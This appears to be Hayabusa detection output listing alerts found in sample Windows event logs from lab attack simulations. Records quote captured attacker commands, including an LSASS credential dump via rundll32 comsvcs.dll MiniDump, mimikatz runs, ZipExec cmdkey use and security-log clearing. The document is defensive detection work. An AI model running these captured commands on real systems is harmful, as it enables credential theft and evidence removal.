OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : 
SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx -2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx -2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 
0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 
+09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 
+09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : 
IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump 
with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System 
Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx 
-2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File 
Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:14.015 
+09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx -2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus 
Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Mimikatz Detection LSASS 
Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx -2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx -2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx 
-2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,Logon Failure - Unknown Reason,User: - : Type: 10 : Workstation: - : IP Address: 10.23.23.9 : SubStatus: 0x0 : AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-brutfoce with denied access due to account restriction.evtx -2021-10-26 03:04:30.334 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:09:51.875 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.002 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.080 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.095 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.127 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.142 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx -2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 